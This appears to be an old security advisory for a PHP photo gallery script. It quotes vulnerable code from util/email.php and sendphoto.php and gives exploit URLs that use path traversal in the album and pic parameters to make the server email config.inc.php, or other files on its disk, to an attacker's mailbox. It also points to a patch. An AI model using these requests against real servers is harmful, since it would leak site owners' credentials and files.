Informations : �������������� Version : 0.86-dev Website : http://www.wihsy.com problem : All files from the hard disk can be send by mail
PHP Code/Location : ������������������� util/email.php :
------------------------------------------------------------------------
<?
class CMailFile {
var $subject;
var $addr_to;
var $text_body;
var $text_encoded;
var $mime_headers;
var $mime_boundary = "--==================_846811060==_";
var $smtp_headers;function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) {
$this->subject = $subject;
$this->addr_to = $to;
$this->smtp_headers = $this->write_smtpheaders($from);
$this->text_body = $this->write_body($msg);
$this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename);
$this->mime_headers = $this->write_mimeheaders($filename, $mime_filename);
}
function attach_file($filename,$mimetype,$mime_filename) {
$encoded = $this->encode_file($filename);
if ($mime_filename) $filename = $mime_filename;
$out = "--" . $this->mime_boundary . "\n";
$out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n";
$out = $out . "Content-Transfer-Encoding: base64\n";
$out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n";
$out = $out . $encoded . "\n";
$out = $out . "--" . $this->mime_boundary . "--" . "\n";
return $out;
// added -- to notify email client attachment is done
}
function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; }
function sendfile() {
$headers = $this->smtp_headers . $this->mime_headers;
$message = $this->text_body . $this->text_encoded;
mail($this->addr_to,$this->subject,$message,$headers);
}[...]
function write_mimeheaders($filename, $mime_filename) {
if ($mime_filename) $filename = $mime_filename;
$out = "MIME-version: 1.0\n";
$out = $out . "Content-type: multipart/mixed; ";
$out = $out . "boundary=\"$this->mime_boundary\"\n";
$out = $out . "Content-transfer-encoding: 7BIT\n";
$out = $out . "X-attachments: $filename;\n\n";
return $out;
}
[...]
}
[...]
------------------------------------------------------------------------sendphoto.php :
------------------------------------------------------------------------
include("util/email.php");include("config.inc.php");
[...]
if (!$filled) {print "<FORM METHOD=POST ACTION=sendphoto.php>\n"; print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n"; print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n"; print "<INPUT TYPE=hidden NAME=album VALUE="; print rawurlencode($album); print ">\n"; print "<center><p>$sendphoto_send_photo_to<br>"; print "<INPUT NAME=sendto></input></center>\n"; print "<p>\n"; print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n"; print "</form>\n"; print "</body></html>\n";
}
else
{$message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg";
$newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
$newmail->sendfile();
print "$sendphoto_successful";
print "</body></html>\n"; }
?> ------------------------------------------------------------------------
Exploits : ���������� http://[target]/sendphoto.php?album=..&pic=config.inc.php or http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent.
Patch : ������� A patch can be found on http://www.phpsecure.info .
More Details : �������������� In French : http://www.frog-man.org/tutos/WihPhoto.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
[EMAIL PROTECTED]
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
